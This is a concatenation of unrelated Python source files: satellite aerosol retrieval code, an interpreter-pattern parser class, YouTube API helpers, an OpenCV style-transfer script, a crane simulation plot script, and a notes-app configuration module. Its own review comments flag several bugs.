    mask = np.bool_(reg_is_used[i2d] & reg_is_used[j2d] & np.not_equal(i2d, j2d))
    i = ind_used[i2d[mask]]
    j = ind_used[j2d[mask]]
    tau0 = aod(date, path, orbit, block)
    # Initialize AOD uniformly at the block mean, and component weights
    # uniformly at 1/COMPONENT_NUM.
    tau = np.mean(tau0)*np.ones(num_reg_used)
    theta = 1.0/COMPONENT_NUM * np.ones((COMPONENT_NUM, num_reg_used), dtype=float)
    return x, y, i, j, num_reg_used, tau, theta, channel_is_used, min_equ_ref, mean_equ_ref, eof, max_usable_eof, ss, ms, optical_properties
def particle(date, path, orbit):
    """Parse per-component particle optical properties from the HDF summary table.

    Extracts rows 8..91 of the text between the "Part 2" and "Shape types:"
    markers and returns columns 4:6 of each row as floats in an ndarray.
    """
    file_aerosol = _MIL2ASAE_fname(date, path, orbit)
    f = hdf4.HDF4_root(file_aerosol)
    str_table = f.children['Component Particle Information'].attr['Component Particle Properties - Summary Table'].value
    p1 = re.compile(r'Part 2 *').search(str_table).start()
    p2 = re.compile(r'Shape types:*').search(str_table).start()
    str_dat = str_table[p1:p2].split('\n')[8:92]
    # list(map(...)) so every row is a concrete list of floats; under
    # Python 3 a bare map object would otherwise become a single (useless)
    # object element of the array instead of a numeric row.
    optical_properties = np.array(
        [list(map(float, re.compile(r'(\s\s+)').sub(',', x).split(',')[4:6])) for x in str_dat])
    return optical_properties
def aod(date, path, orbit, block):
    """Read the green-band regional mean AOD for one block.

    Fill values (-9999) are replaced by the mean of the valid entries.
    ``block`` is 1-based, matching the product's block numbering.
    """
    from constant import BAND_GREEN
    file_aerosol = _MIL2ASAE_fname(date, path, orbit)
    sd = SD(file_aerosol)
    tau0 = sd.select('RegMeanSpectralOptDepth').get()[block-1, :, :, BAND_GREEN]
    fill_mask = tau0 == -9999
    tau0[fill_mask] = np.mean(tau0[~fill_mask])
    return tau0
def _reg_dat(date, path, orbit, block, r):
    """Load the cached regression .mat file (uses the MATLAB block number)."""
    return scipy.io.loadmat(_reg_mat_fname(date, path, orbit, block, r))
def get_q(r):
    """Load the precision matrix Q for resolution ``r`` from prec.mat.

    Supports r == 4400 and r == 1100. For any other value it prints a
    message and returns None (behavior preserved from the original).
    """
    dat = scipy.io.loadmat('prec.mat')
    if r == 4400:
        return dat['Q_4400']
    elif r == 1100:
        return dat['Q_1100']
    else:
        # print() works on both Python 2 and 3; the original used a
        # Python-2-only print statement here.
        print('resolution not implemented!')
def _MIL2ASAE_fname(date, path, orbit):
    """Build the MIL2ASAE HDF product path for a given date/path/orbit."""
    orbit_str = fN.orbit2str(orbit)
    path_str = fN.path2str(path)
    from constant import HEADER_MIL2ASAE_FILENAME
    return str(header_file_aerosol + date + '/' + HEADER_MIL2ASAE_FILENAME
               + path_str + '_O' + orbit_str + '_F12_0022.hdf')
def _reg_mat_fname(date, path, orbit, block, r):
    """Build the cached .mat filename for a date/path/orbit/block/resolution."""
    orbit_str = fN.orbit2str(orbit)
    path_str = fN.path2str(path)
    name = '%s%s_P%s_O%s_B%s_R%s.mat' % (header_data, date, path_str,
                                         orbit_str, block, r)
    return str(name)
def merge_dict(file_xls, r):
    """Build merged data/param/neighbor/env dictionaries for the scenes
    listed in an Excel sheet (Python 2 code: uses xrange and print statements).

    Only rows 5:6 of the sheet are used here (a single scene slice).
    Returns the concatenated per-pixel dictionaries plus per-scene arrays.
    """
    xls = pd.ExcelFile(file_xls)
    sheet_name = xls.sheet_names[0]
    df = xls.parse(sheet_name)
    # Hard-coded slice: only the 6th row of each column is processed.
    dates = list(df['Dates'][5:6])
    paths = list(df['Paths'][5:6])
    orbits = list(df['Orbits'][5:6])
    blocks = list(df['Blocks'][5:6])
    dict_data0 = []
    dict_param0 =[]
    dict_neigh0 = []
    dict_env0 = []
    N = len(dates)
    optical_properties0 = [[]] * N
    num_reg_used0 = [0] * N
    i0 = [[]] * N
    j0 = [[]] * N
    for d in xrange(N):
        date = dates[d]
        path = paths[d]
        orbit = orbits[d]
        block = blocks[d]
        x, y, i, j, num_reg_used, tau, theta, channel_is_used, min_equ_ref, mean_equ_ref, eof, max_usable_eof, ss, ms, optical_properties = \
            reg_smart(date, path, orbit, block, r)
        dict_data, dict_param = get_data_param(date, path, orbit, block,\
            x, y, num_reg_used, tau, theta, channel_is_used, min_equ_ref, mean_equ_ref, eof, max_usable_eof, ss, ms, optical_properties, r)
        dict_neigh = update.get_neigh(date, path, orbit, block, i, j, num_reg_used)
        dict_env = update.get_env_block(tau, theta, num_reg_used, dict_neigh)
        # Concatenate per-scene lists into the global accumulators.
        dict_data0 = dict_data0 + dict_data
        dict_param0 = dict_param0 + dict_param
        dict_neigh0 = dict_neigh0 + dict_neigh
        dict_env0 = dict_env0 + dict_env
        optical_properties0[d] = optical_properties
        num_reg_used0[d] = num_reg_used
        i0[d] = i
        j0[d] = j
        print date + " dictionary is done!"
    return dict_data0, dict_param0, dict_neigh0, dict_env0, optical_properties0, num_reg_used0, i0, j0, dates, paths, orbits, blocks
def get_data_param(date, path, orbit, block, x, y, num_reg_used, tau, theta, channel_is_used, min_equ_ref, mean_equ_ref, eof, max_usable_eof, ss, ms, optical_properties, r):
    """Build (key, PixelData) and (key, PixelParam) pairs for every used region.

    For each region index p, extracts the pixel's regression/SMART data,
    computes its residual from the initial (tau, theta), and stores both
    under a key derived from date/path/orbit/block/p.
    (Python 2 code: uses xrange.)
    """
    ps = xrange(num_reg_used)
    keys = [fN.get_key(date, path, orbit, block, p) for p in ps]
    dict_data = []
    dict_param = []
    for p in ps:
        tau_p = tau[p]
        theta_p = theta[:, p]
        reg_p, smart_p = extract.pixel(x[p], y[p], channel_is_used, min_equ_ref, mean_equ_ref, eof, max_usable_eof, ss, ms, r)
        # Only the residual (third return value) is kept here.
        _, _, resid_p = update.get_resid(tau_p, theta_p, reg_p, smart_p, optical_properties, r)
        dict_data.append((keys[p], PixelData(reg_p, smart_p)))
        dict_param.append((keys[p], update.PixelParam(tau_p, theta_p, resid_p)))
    return dict_data, dict_param
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ˅
from behavioral_patterns.interpreter.node import Node
# ˄
class CommandList(Node):
    """Interpreter-pattern nonterminal: a sequence of commands ended by 'end'.

    Parses tokens into Command nodes until the literal token 'end' is
    consumed; a missing 'end' aborts the process via exit().
    (The ˅/˄ marker comments delimit hand-edited regions for the code
    generator that produced this file -- do not remove them.)
    """
    # ˅
    # ˄
    def __init__(self):
        # Parsed child nodes, stored as their string representations.
        self.__nodes = []
        # ˅
        pass
        # ˄
    def parse(self, context):
        # ˅
        # Write here to avoid circular import errors.
        from behavioral_patterns.interpreter.command import Command
        while True:
            if context.get_token() is None:
                # Ran out of tokens without seeing 'end': hard abort.
                exit('ERROR: Missing \'end\'')
            elif context.get_token() == 'end':
                # Consume the terminator and stop parsing this list.
                context.slide_token(token='end')
                break
            else:
                _node = Command()
                _node.parse(context)
                self.__nodes.append(_node.to_string()) # Hold the parsed node
        # ˄
    def to_string(self):
        # ˅
        # e.g. "[go, right, go]" -- nodes were stringified at parse time.
        return f'[{", ".join(self.__nodes)}]'
        # ˄
    # ˅
    # ˄
# ˅
# ˄
|
import requests
import app_config as app_config
import json
# YouTube Data API v3 endpoint URLs.
base_url = 'https://youtube.googleapis.com/youtube/v3/'
channels_url = base_url + 'channels'
playlist_url = base_url + 'playlistItems'
search_url = base_url + 'search'
videos_url = base_url + 'videos'
# Pre-encoded URL characters: '#' and '|'.
ht = '%23'
pipe = '%7C'
# When True, pagination progress is printed while fetching uploads.
verbose = True
def make_response(status, message):
    """Serialize a {status, message} envelope to a JSON string."""
    return json.dumps({'status': status, 'message': message})
def make_success(message):
    """Build a JSON response envelope with status ``success``."""
    status = 'success'
    return make_response(status, message)
def make_fail(message):
    """Build a JSON response envelope with status ``fail``."""
    status = 'fail'
    return make_response(status, message)
def make_error(message):
    """Build a JSON response envelope with status ``error``."""
    status = 'error'
    return make_response(status, message)
def get_video_url(id):
    """Return the public watch URL for a YouTube video id."""
    return 'https://www.youtube.com/watch?v={}'.format(id)
def get_channel_url(id):
    """Return the public URL for a YouTube channel id."""
    return 'https://www.youtube.com/channel/{}'.format(id)
def get_channel_by_id(id):
    """Fetch a channel's metadata (title, description, uploads playlist, ...)
    from the YouTube Data API.

    Returns a dict on success. On a parse failure it now returns the JSON
    error envelope from make_error() -- the original called make_error()
    but discarded the result and fell through to an implicit None, which is
    inconsistent with get_video_by_id().
    """
    channel = {}
    data = {
        'part': 'snippet,contentDetails',
        'id': id,
        'key': app_config.YOUTUBE_API_KEY,
        'fields': 'items(id,contentDetails/relatedPlaylists/uploads,snippet(title,description,publishedAt,thumbnails/high/url))'
    }
    r = requests.get(channels_url, params=data).json()
    try:
        item = r['items'][0]
        snippet = item.get('snippet', 'N/A')
        details = item.get('contentDetails', 'N/A')
        if snippet != 'N/A':
            channel['channel_title'] = snippet.get('title', 'N/A')
            channel['channel_description'] = snippet.get('description', 'N/A')
            channel['channel_id'] = item.get('id', 'N/A')
            channel['channel_url'] = 'https://www.youtube.com/channel/' + channel['channel_id']
            channel['channel_thumbnail_url'] = snippet.get('thumbnails', 'N/A').get('high', 'N/A').get('url', 'N/A')
        if details != 'N/A':
            channel['channel_uploads_playlist'] = details.get('relatedPlaylists', 'N/A').get('uploads', 'N/A')
        return channel
    except Exception:
        # Narrowed from a bare ``except:`` (which also swallowed
        # KeyboardInterrupt/SystemExit) and the envelope is now returned.
        return make_error("Failed to get channel from Youtube API")
def get_uploads_by_id(id, pages=1, max_count=5):
    """Fetch up to ``pages`` pages of an uploads playlist's videos.

    id: the uploads playlist ID (see get_channel_by_id's
        channel_uploads_playlist). max_count: items per page.
    Returns a list of video dicts; on any API/parse error returns the
    sentinel list ['Youtube API Error'].
    """
    uploads = []
    next_page_token = ''
    for x in range(0, pages):
        if verbose:
            print('Page {} of {}'.format(str(x), str(pages)))
        data = {
            'part': 'snippet',
            'playlistId': id,
            'maxResults': max_count,
            'key': app_config.YOUTUBE_API_KEY,
            'fields': 'nextPageToken,items(id,snippet(title,description,channelId,channelTitle,publishedAt,resourceId/videoId,thumbnails/high/url))'
        }
        # Only send a page token after the first request.
        if next_page_token != '':
            data['pageToken'] = next_page_token
        r = requests.get(playlist_url, params=data).json()
        try:
            for item in r['items']:
                video = {}
                snippet = item.get('snippet', 'N/A')
                if snippet != 'N/A':
                    video['video_title'] = snippet.get('title', 'N/A')
                    video['video_description'] = snippet.get('description', 'N/A')
                    video['video_id'] = snippet.get('resourceId', 'N/A').get('videoId', 'N/A')
                    video['video_url'] = 'https://www.youtube.com/watch?v=' + video['video_id']
                    video['playlistItemId'] = item.get('id', 'N/A')
                    video['published_data'] = snippet.get('publishedAt', 'N/A')
                    video['thumbnail'] = snippet.get('thumbnails', 'N/A').get('high', 'N/A').get('url', 'N/A')
                    video['channel_title'] = snippet.get('channelTitle', 'N/A')
                    video['channel_id'] = snippet.get('channelId', 'N/A')
                    video['channel_url'] = 'https://www.youtube.com/channel/' + video['channel_id']
                    uploads.append(video)
            # 'N/A' doubles as the "no more pages" sentinel.
            next_page_token = r.get('nextPageToken', 'N/A')
            if next_page_token == 'N/A':
                print("No more pages")
                break
        except:
            # NOTE(review): bare except; returns a sentinel list instead of
            # an error envelope like the other helpers -- confirm callers.
            return ['Youtube API Error']
    return uploads
def get_video_by_id(video_id):
    """Fetch one video's snippet and statistics from the YouTube Data API.

    Returns a dict of video_*/channel_* fields on success, or the JSON
    error envelope from make_error() on failure.
    """
    video = {}
    data = {
        'part': 'snippet,statistics,player',
        'id': video_id,
        'key': app_config.YOUTUBE_API_KEY,
        'fields': 'items(id,snippet(title,description,channelId,channelTitle,publishedAt,thumbnails/high/url,tags),statistics(viewCount,likeCount,dislikeCount,commentCount),player/embedHtml)'
    }
    r = requests.get(videos_url, params=data).json()
    try:
        items = r['items'][0]
        # 'N/A' is used as the missing-value sentinel throughout.
        snippet = items.get('snippet', 'N/A')
        statistics = items.get('statistics', 'N/A')
        player = items.get('player', 'N/A')
        if snippet != 'N/A':
            video['video_title'] = snippet.get('title', 'N/A')
            video['video_description'] = snippet.get('description', 'N/A')
            video['video_id'] = items.get('id', 'N/A')
            video['video_url'] = 'https://www.youtube.com/watch?v=' + video['video_id']
            video['video_tags'] = snippet.get('tags', [])
            video['video_published_date'] = snippet.get('publishedAt', 'N/A')
            video['video_thumbnail_url'] = snippet.get('thumbnails', 'N/A').get('high', 'N/A').get('url', 'N/A')
            video['channel_title'] = snippet.get('channelTitle', 'N/A')
            video['channel_id'] = snippet.get('channelId', 'N/A')
            video['channel_url'] = 'https://www.youtube.com/channel/' + video['channel_id']
        if statistics != 'N/A':
            video['video_views'] = statistics.get('viewCount', 'N/A')
            video['video_likes'] = statistics.get('likeCount', 'N/A')
            video['video_dislikes'] = statistics.get('dislikeCount', 'N/A')
            video['video_comments'] = statistics.get('commentCount', 'N/A')
        # NOTE(review): ``player`` is fetched but never used -- confirm intent.
        return video
    except:
        # NOTE(review): bare except hides the real failure cause.
        return make_error('Failed to get video from Youtube API')
def search_videos(query, pages=1, max_count=50, start_token='', sort_by='relevance', language_relevance=True, additional_fields={}):
    """Search YouTube for videos matching ``query``, following pagination.

    The next-page token is persisted to ./next.txt after every page so a
    later call can resume via ``start_token``.
    NOTE: ``additional_fields`` is a mutable default -- callers must not
    mutate it; it is only read here.
    Returns a list of video dicts (possibly partial if the API errors out).
    """
    videos = []
    next_page_token = start_token
    for x in range(0, pages):
        print('Page {} of {}'.format(str(x + 1), str(pages)))
        data = {
            'part': 'snippet',
            # The original also sent 'id': id, which passed the *builtin
            # function* ``id`` as a query parameter -- a copy-paste bug from
            # the lookup helpers; the search endpoint takes no such field.
            'q': query,
            'maxResults': max_count,
            'safeSearch': 'none',
            'type': 'video',
            'key': app_config.YOUTUBE_API_KEY,
            'order': sort_by,
            'fields': 'nextPageToken,items(id/videoId,snippet(title,description,channelId,channelTitle,publishedAt,thumbnails/high/url))'
        }
        if language_relevance:
            data['relevanceLanguage'] = 'en'
        for k in additional_fields:
            data[k] = additional_fields[k]
        if next_page_token != '':
            data['pageToken'] = next_page_token
        r = requests.get(search_url, params=data).json()
        # print(str(r))
        try:
            for item in r['items']:
                video = {}
                snippet = item.get('snippet', 'N/A')
                if snippet != 'N/A':
                    video['video_title'] = snippet.get('title', 'N/A')
                    video['video_description'] = snippet.get('description', 'N/A')
                    video['video_id'] = item.get('id', 'N/A').get('videoId', 'N/A')
                    video['video_url'] = 'https://www.youtube.com/watch?v=' + video['video_id']
                    video['video_published_date'] = snippet.get('publishedAt', 'N/A')
                    video['video_thumbnail_url'] = snippet.get('thumbnails', 'N/A').get('high', 'N/A').get('url', 'N/A')
                    video['channel_title'] = snippet.get('channelTitle', 'N/A')
                    video['channel_id'] = snippet.get('channelId', 'N/A')
                    video['channel_url'] = 'https://www.youtube.com/channel/' + video['channel_id']
                    videos.append(video)
            next_page_token = r.get('nextPageToken', 'N/A')
            if next_page_token == 'N/A':
                print("No more pages")
                # Clear the resume file when pagination is exhausted.
                file = open('./next.txt', 'w+', encoding='utf-8')
                file.write('')
                file.close()
                break
            else:
                file = open('./next.txt', 'w+', encoding='utf-8')
                file.write(str(next_page_token))
                file.close()
        except Exception:
            # Narrowed from a bare ``except:`` so Ctrl-C still works.
            print('Youtube API Error: {}'.format(str(r)))
            break
    return videos
|
import argparse
import time
import os
import subprocess
import cv2 as cv
import numpy as np
# Parsed CLI arguments; populated in the __main__ block below.
FLAGS = None
# Mode tags selected by whether an --image argument was supplied.
VID = 'video'
IMG = 'image'
# Per-channel (BGR) mean offsets: subtracted from the input blob before
# inference and added back to the network output afterwards.
meanX = 103.939
meanY = 116.779
meanZ = 123.680
def nothing(v):
    """Debug/no-op callback: echoes its argument to stdout."""
    message = 'hello ' + v
    print(message)
def predict_all(img, values, h, w):
    """Blend the stylized outputs of all loaded models, weighted by ``values``.

    img: input BGR image; values: one weight per model in the module-level
    ``nets`` list; h, w: blob size for inference.
    If all weights are zero, returns the min-max-normalized input unchanged.
    """
    blob = cv.dnn.blobFromImage(img, 1.0, (w, h),
                                (meanX, meanY, meanZ), swapRB=False, crop=False)
    # Builtin sum() -- the original shadowed it with a manual accumulation loop.
    total = sum(values)
    out = cv.normalize(img, None, 0, 255, cv.NORM_MINMAX, cv.CV_8U)
    if total == 0:
        return out
    weights = [value / total for value in values]
    num_models = 0
    for i, net in enumerate(nets):
        if weights[i] != 0:
            print("[INFO] Applying model " + str(i) + ", weight: " + str(weights[i]))
            # First contributing model initializes the accumulator;
            # later ones are added in.
            if num_models == 0:
                out = predict(blob, net, h, w) * weights[i]
            else:
                out += predict(blob, net, h, w) * weights[i]
            num_models += 1
    return out
def predict(blob, net, h, w):
    """Run one style-transfer model on a preprocessed blob.

    Returns a float image in [0, 1]-ish range, HxWx3, with the channel
    means added back. Prints the inference time when
    FLAGS.print_inference_time is set.
    """
    print ('[INFO] Setting the input to the model')
    net.setInput(blob)
    print ('[INFO] Starting Inference!')
    start = time.time()
    out = net.forward()
    end = time.time()
    print ('[INFO] Inference Completed successfully!')
    # Reshape the output tensor and add back in the mean subtraction, and
    # then swap the channel ordering
    out = out.reshape((3, out.shape[2], out.shape[3]))
    out[0] += meanX
    out[1] += meanY
    out[2] += meanZ
    out /= 255.0
    # CHW -> HWC for display with cv.imshow.
    out = out.transpose(1, 2, 0)
    # Printing the inference time
    if FLAGS.print_inference_time:
        print ('[INFO] The model ran in {:.4f} seconds'.format(end-start))
    return out
# Source for this function:
# https://github.com/jrosebr1/imutils/blob/4635e73e75965c6fef09347bead510f81142cf2e/imutils/convenience.py#L65
def resize_img(img, width=None, height=None, inter=cv.INTER_AREA):
    """Resize ``img`` to the given width OR height, preserving aspect ratio.

    With both width and height None the image is returned untouched.
    (As in the original, supplying both leaves ``dim`` as None.)
    """
    dim = None
    (h, w) = img.shape[:2]
    if width is None and height is None:
        return img
    elif width is None:
        ratio = height / float(h)
        dim = (int(w * ratio), height)
    elif height is None:
        ratio = width / float(w)
        dim = (width, int(h * ratio))
    return cv.resize(img, dim, interpolation=inter)
if __name__ == '__main__':
    # CLI: choose model(s), run either live-video blending driven by
    # weights read from values.txt, or single-image stylization.
    parser = argparse.ArgumentParser()
    parser.add_argument('-m', '--model-path',
                        type=str,
                        default='./models/instance_norm/',
                        help='The model directory.')
    parser.add_argument('-i', '--image',
                        type=str,
                        help='Path to the image.')
    parser.add_argument('-md', '--model',
                        type=str,
                        help='The file path to the direct model.\
                        If this is specified, the model-path argument is \
                        not considered.')
    # NOTE(review): argparse type=bool does not parse booleans -- any
    # non-empty string becomes True; action='store_true' was likely intended.
    parser.add_argument('--show-original-image',
                        type=bool,
                        default=False,
                        help='Whether or not to show the original image')
    parser.add_argument('--save-image-with-name',
                        type=str,
                        default='stylizedimage.png',
                        help='The path to save the generated stylized image \
                        only when in image mode.')
    parser.add_argument('--download-models',
                        type=bool,
                        default=False,
                        help='If set to true all the pretrained models are downloaded, \
                        using the script in the downloads directory.')
    parser.add_argument('--print-inference-time',
                        type=bool,
                        default=False,
                        help='If set to True, then the time taken for the model is output \
                        to the console.')
    FLAGS, unparsed = parser.parse_known_args()
    # download models if needed
    if FLAGS.download_models:
        subprocess.call(['./models/download.sh'])
    # Set the mode image/video based on the argparse
    if FLAGS.image is None:
        mode = VID
    else:
        mode = IMG
    # Check if there are models to be loaded and list them
    models = []
    for f in sorted(os.listdir(FLAGS.model_path)):
        if f.endswith('.t7'):
            models.append(f)
    if len(models) == 0:
        raise Exception('The model path doesn\'t contain models')
    # Load the neural style transfer model
    path = FLAGS.model_path + ('' if FLAGS.model_path.endswith('/') else '/')
    print (path + models[0])
    print ('[INFO] Loading the model...')
    total_models = len(os.listdir(FLAGS.model_path))
    nets = []
    for model in models:
        model_to_load = path + model
        nets.append(cv.dnn.readNetFromTorch(model_to_load))
    print ('[INFO] Model Loaded successfully!')
    # Loading the image depending on the type
    if mode == VID:
        pass
        # NOTE(review): window is created as "Real-time Video" but moved as
        # "Real-time video" (case mismatch) -- moveWindow targets a
        # different (new) window.
        cv.namedWindow("Real-time Video")
        cv.moveWindow("Real-time video", 400, 0)
        cv.namedWindow("Preview")
        cv.moveWindow("Preview", 0, 0)
        vid = cv.VideoCapture(0)
        while True:
            _, frame = vid.read()
            img = resize_img(frame, width=400)
            h, w = img.shape[:2]
            cv.imshow("Real-time Video", img)
            # Per-model blend weights are re-read from values.txt each frame
            # (expects one line with 6 ';'-separated integers).
            fValues = open("values.txt", "rt")
            lines = fValues.read().splitlines()
            fValues.close()
            values = []
            svalues = lines[0].split(';')
            for i in range(0,6):
                values.append(int(svalues[i]))
            out = predict_all(img, values, h, w)
            cv.imshow('Preview', out)
            # The presence of a "shoot" file triggers a snapshot to picture.jpg.
            if os.path.exists("./shoot"):
                os.system("rm -f shoot")
                frame_normed = 255 * (out - out.min()) / (out.max() - out.min())
                # NOTE(review): np.int was removed in NumPy 1.24 -- use int
                # or np.int64 on modern NumPy.
                frame_normed = np.array(frame_normed, np.int)
                cv.imwrite("./picture.jpg", frame_normed)
            key = cv.waitKey(1) & 0xFF
            if key == ord('q'):
                break
            elif key == ord('n') and FLAGS.model is None:
                # NOTE(review): model_loaded_i is never initialized before
                # this point -- first 'n'/'p' press raises NameError; the
                # reloaded ``net`` is also never used by predict_all.
                model_loaded_i = (model_loaded_i + 1) % total_models
                model_to_load = path + models[model_loaded_i]
                net = cv.dnn.readNetFromTorch(model_to_load)
            elif key == ord('p') and FLAGS.model is None:
                model_loaded_i = (model_loaded_i - 1) % total_models
                model_to_load = path + models[model_loaded_i]
                net = cv.dnn.readNetFromTorch(model_to_load)
        vid.release()
        cv.destroyAllWindows()
    elif mode == IMG:
        print ('[INFO] Reading the image')
        img = cv.imread(FLAGS.image)
        print ('[INFO] Image Loaded successfully!')
        img = resize_img(img, width=600)
        h, w = img.shape[:2]
        # Get the output from the pretrained model
        # NOTE(review): predict() takes (blob, net, h, w) -- these 3-argument
        # calls (here and below) raise TypeError as written.
        out = predict(img, h, w)
        # show the image
        if FLAGS.show_original_image:
            cv.imshow('Input Image', img)
        cv.imshow('Stylized image', out)
        meanX += 50
        meanY += 50
        meanZ += 50
        out2 = predict(img, h, w)
        cv.imshow('Stylized image 2', out2)
        meanX -= 100
        meanY -= 100
        meanZ -= 100
        out3 = predict(img, h, w)
        cv.imshow('Stylized image 3', out3)
        model_to_load = path + models[1]
        net = cv.dnn.readNetFromTorch(model_to_load)
        out4 = predict(img, h, w)
        cv.imshow('Stylized image 4', out4)
        out5 = (out + out4) * 0.5
        cv.imshow('Stylized image 5', out5)
        print ('[INFO] Hit Esc to close!')
        cv.waitKey(0)
        if FLAGS.save_image_with_name is not None:
            cv.imwrite(FLAGS.save_image_with_name, out)
|
# Boom-crane PD-vs-unshaped comparison script: environment setup.
import warnings
warnings.simplefilter("ignore", UserWarning)
# Import the necessary python library modules
import numpy as np
from matplotlib import pyplot as plt
from scipy.optimize import minimize
import os
import sys
import pdb
# Add my local path to the relevant modules list
sys.path.append('/Users/Daniel/Github/Crawlab-Student-Code/Daniel Newman/Python Modules')
# Import my python modules
import InputShaping as shaping
import Boom_Crane as BC
import Generate_Plots as genplt
import si
# Use lab plot style
# NOTE(review): requires a matplotlib style named 'Crawlab' to be installed.
plt.style.use('Crawlab')
# define constants
DEG_TO_RAD = np.pi / 180
# Gravitational acceleration (m/s^2).
G = 9.81
# Crane geometry/limits -- units presumably meters and deg/s^2, deg/s
# per the plot labels below; TODO confirm against Boom_Crane.init_crane.
Boom=0.81
Cable=0.30
Amax=174.0
Vmax=17.4
# Start and end luff angles (degrees).
Luff_vals = np.array([60.,30.])
# Simulation horizon and step (seconds).
Tmax=5.0
Tstep=0.01
normalized_amp=0.8
phase=90.
Startt=np.array([0.])
# Build the crane model, simulate PD-feedback vs unshaped responses, and
# plot swing angle, luff angle, and luff velocity comparisons.
p = BC.init_crane( Boom,
                    Cable,
                    Amax,
                    Vmax,
                    Luff_vals,
                    Tmax,
                    Tstep,
                    normalized_amp,
                    phase,
                    Startt=Startt
                    )
# Unpack the packed model tuple (limits, lengths, timing, initial state).
[Amax,Vmax], l, r, StartTime, t_step,t,X0,Distance = p
pd_response = BC.response(p,['Feedback'],feedback_control='PD')
unshaped_response = BC.response(p,['Unshaped'])
# Determine the folder where the plots will be saved
folder = 'Figures/{}/Luff_{}_{}'.format(
            sys.argv[0],
            Luff_vals[0],Luff_vals[1],
            )
# Response columns: 0 = swing angle, 2 = luff angle, 3 = luff velocity
# (per the axis labels below).
genplt.compare_responses(t,
                        pd_response[:,0],'PD',
                        unshaped_response[:,0],'Unshaped',
                        name_append='Swing',
                        xlabel='Time (s)',ylabel='Swing Angle (deg)',
                        folder=folder,grid=False,save_data=False
                        )
genplt.compare_responses(t,
                        pd_response[:,2],'PD',
                        unshaped_response[:,2],'Unshaped',
                        name_append='Displacement',
                        xlabel='Time (s)',ylabel='Luff Angle (deg)',
                        folder=folder,grid=False,save_data=False
                        )
genplt.compare_responses(t,
                        pd_response[:,3],'PD',
                        unshaped_response[:,3],'Unshaped',
                        name_append='Velocity',
                        xlabel='Time (s)',ylabel='Luff Velocity (deg/s)',
                        folder=folder,grid=False,save_data=False
                        )
import os
import copy
import json
import logging
from typing import Optional, TypedDict, NewType
from shorthand.types import ExecutablePath, FilePath, DirectoryPath, RelativeDirectoryPath
class ShorthandFrontendConfig(TypedDict):
    """Frontend-only settings nested under the top-level config's "frontend" key."""
    # Maximum number of entries kept in the view history.
    view_history_limit: int
    # Leaflet-style tile URL template for the map view.
    map_tileserver_url: str
class ShorthandConfig(TypedDict):
    """Full shorthand configuration as loaded from the JSON config file."""
    # The only required field (see REQUIRED_FIELDS below).
    notes_directory: DirectoryPath
    cache_directory: DirectoryPath
    # Optional default directory, relative to notes_directory.
    default_directory: Optional[RelativeDirectoryPath]
    log_file_path: FilePath
    log_level: str
    log_format: str
    # Paths to the external grep/find executables used for searching.
    grep_path: ExecutablePath
    find_path: ExecutablePath
    frontend: ShorthandFrontendConfig
class ShorthandConfigUpdates(TypedDict, total=False):
    """Partial config for _modify_config: any subset of fields may be present.

    Deliberately omits notes_directory, which cannot be changed via the API.
    """
    cache_directory: DirectoryPath
    default_directory: Optional[RelativeDirectoryPath]
    log_file_path: FilePath
    log_level: str
    log_format: str
    grep_path: ExecutablePath
    find_path: ExecutablePath
    frontend: ShorthandFrontendConfig
# Default locations and settings used when the config file omits a field.
CONFIG_FILE_LOCATION = '/etc/shorthand/shorthand_config.json'
DEFAULT_NOTES_DIR = '/var/lib/shorthand/notes'
DEFAULT_CACHE_DIR = '/var/lib/shorthand/cache'
DEFAULT_LOG_FILE = '/var/log/shorthand/shorthand.log'
DEFAULT_LOG_FORMAT = '%(asctime)s %(name)s %(levelname)-8s %(message)s'
DEFAULT_LOG_LEVEL = 'INFO'
# Bare executable names: resolved via $PATH.
DEFAULT_GREP_PATH = 'grep'
DEFAULT_FIND_PATH = 'find'
DEFAULT_FRONTEND_CONFIG: ShorthandFrontendConfig = {
    'view_history_limit': 100,
    'map_tileserver_url': 'https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png'
}
DEFAULT_CONFIG: ShorthandConfig = {
    "notes_directory": DEFAULT_NOTES_DIR,
    "cache_directory": DEFAULT_CACHE_DIR,
    "default_directory": None,
    "log_file_path": DEFAULT_LOG_FILE,
    "log_level": DEFAULT_LOG_LEVEL,
    "log_format": DEFAULT_LOG_FORMAT,
    "grep_path": DEFAULT_GREP_PATH,
    "find_path": DEFAULT_FIND_PATH,
    "frontend": DEFAULT_FRONTEND_CONFIG
}
# Fields that must be present in any user-supplied config.
REQUIRED_FIELDS = ['notes_directory']
log = logging.getLogger(__name__)
def _get_notes_config(config_location: FilePath = CONFIG_FILE_LOCATION
                      ) -> ShorthandConfig:
    '''Get notes config from the file path specified

    returns the loaded, cleaned, and validated config
    '''
    if '~' in config_location:
        config_location = os.path.expanduser(config_location)
    if not os.path.exists(config_location):
        raise ValueError(f'Config file {config_location} does not exist')
    with open(config_location, 'r') as config_file:
        raw_config = json.load(config_file)
    return clean_and_validate_config(raw_config)
def _write_config(config_location: FilePath, config: ShorthandConfig) -> None:
    '''Write the specified config into a config file
    '''
    # Validate first so a broken config is never persisted.
    validated = clean_and_validate_config(config)
    # Create the parent directory if it is missing.
    target_dir = os.path.dirname(config_location)
    if not os.path.exists(target_dir):
        log.warning(f'Config directory {target_dir} ' +
                    f'does not exist, creating it')
        os.makedirs(target_dir)
    with open(config_location, 'w') as out_file:
        json.dump(validated, out_file)
def _modify_config(config: ShorthandConfig, updates: ShorthandConfigUpdates
                   ) -> ShorthandConfig:
    '''Apply a partial set of updates to an existing config.

    ``updates`` has the same shape as a regular config but may contain
    only a subset of the fields.  The notes directory cannot be changed
    this way.  Returns a new, validated config; the input is untouched.
    '''
    if not isinstance(updates, dict):
        raise ValueError('Config updates must be provided as a dictionary')
    if 'notes_directory' in updates:
        raise ValueError('Cannot modify the notes directory via the API')
    new_config = copy.deepcopy(config)
    for field, new_value in updates.items():
        if field == 'frontend':
            continue  # nested frontend updates handled separately below
        if field not in DEFAULT_CONFIG.keys():
            raise ValueError(f'Config Update has unknown field {field}')
        new_config[field] = new_value
    if 'frontend' in updates:
        frontend_updates = updates['frontend']
        # Validate provided frontend updates before merging them in
        if not isinstance(frontend_updates, dict):
            raise ValueError('Frontend config must be provided ' +
                             'as a dictionary')
        for frontend_key in frontend_updates.keys():
            if frontend_key not in DEFAULT_FRONTEND_CONFIG.keys():
                raise ValueError(f'Config update has unknown frontend ' +
                                 f'config key {frontend_key}')
        if new_config.get('frontend'):
            new_config['frontend'].update(frontend_updates)
        else:
            new_config['frontend'] = frontend_updates
